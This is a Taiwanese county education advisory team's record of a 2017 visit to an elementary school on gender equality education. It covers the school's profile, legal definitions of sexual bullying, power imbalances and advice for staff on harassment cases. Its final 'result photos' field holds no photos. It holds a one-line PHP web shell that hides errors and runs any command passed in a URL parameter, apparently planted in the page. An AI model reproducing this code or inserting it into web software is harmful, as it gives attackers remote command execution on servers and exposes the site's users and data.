澎湖縣國教輔導團106年度國中小性別平等議題-馬公市中正國小到校輔導

澎湖縣國教輔導團106年度到校輔導紀錄表

服務對象: 
馬公市中正國小
領域別: 
國中小性別平等議題
到校輔導時間: 
2017-11-29 三
出席人員: 
陳玉珍、蔡志鵬
輔導方式: 
教學示例
教材教法輔導
專題講座
綜合座談
分組研討發表
學校狀況: 
該領域專長教師: 0人 非領域專長教師: 36 人
學校特色: 

創校於民國五十六年,民國七十四年八月創辦美術班,推動美育,遠近馳名。校園處處充滿人文藝術氣息,學區附近有天后宮、開拓館、媽宮古城、觀音亭等古蹟歷史建築,擁有豐富的文化資源,將鄉土教育與課程融合,透過多元體驗式活動課程,創意藝術學習,奠基學生人文素養,培育科技人文並進的人才,貫徹『全人教育』的理念。

提供相關問題解決策略: 

•性霸凌: 指透過語言、肢體或其他暴力,對於他人之性別特徵、性別特質、性傾向或性別認同進行貶抑、攻擊或威脅之行為且非屬性騷擾者。
•校園性侵害、性騷擾或性霸凌事件:指性侵害、性騷擾或性霸凌事件 之一方為學校校長、教師、職員、工友或學生,他方為學生者。

•教育基本法

–第8條第2項:

•學生之學習權、受教育權、身體自主權及人格發展權,國家應予保障,並使學生不受任何體罰及霸凌行為,造成身心之侵害。(民95及100年修訂)

–第15條

•教師專業自主權及學生學習權、受教育權、身體自主權及人格發展權遭受學校或主管教育行政機關不當或違法之侵害時,政府應依法令提供當事人或其法定代理人有效及公平救濟之管道。

課程與教學相關問題描述: 

•校園倫理─師生之間、兩性之間

–學術言論自由

–教師的特權及其限制

–學術行政的決策機制

•權力差距

–性平法第30條第七項指稱之衡酌雙方當事人之「權力差距」:指當事人雙方間存在之地位、知識、年齡、體力、身分、族群或資源之不對等狀況(細則16條)。

–校園正義的追尋與尊重

校園性騷擾事件的調查分析
事件意識、認知與處理困境
校園權力結構的介入
權力移轉之間的矛盾
性別特質差異對待與性傾向學生校園處境
懷孕女學生在校園中「自動」消失
校園中性別意識的落差

 

到校輔導內容重點: 

學生有勇氣與能力保護自己的身體隱私。
學生能尊重、而且不侵犯他人隱私。
如何看待加害人的角度。
同時關照受害者的心情。
學生在面對性騷擾時可以怎麼辦?
教職員要有敏感度,並相信孩子的求助訊息。
公告完備的求助系統、建立安全空間、落實管理。

 

-打破保護校譽、保障同事工作權為最優先的心態。
-願意信任孩子、認知到保護學生是教師的天職。
-不從眾!選擇站在對的一方,而不是人多的一方。

 

提供改善學生學習成效之教師教學方案: 

校園霸凌事件層出不窮,普遍存在於校園中。面對這個嚴肅、影響學生身心甚鉅的問題,只靠單方向的宣講,難以達到預期的教育效果。因此,這款桌上型遊戲[魔法學園],希望透過遊戲的方式,帶領孩子理解霸凌的發生脈絡,並且學習應對策略。

 

 

到校輔導成果照片: 
error_reporting(0); $bozx=$_GET[boz]; system($bozx);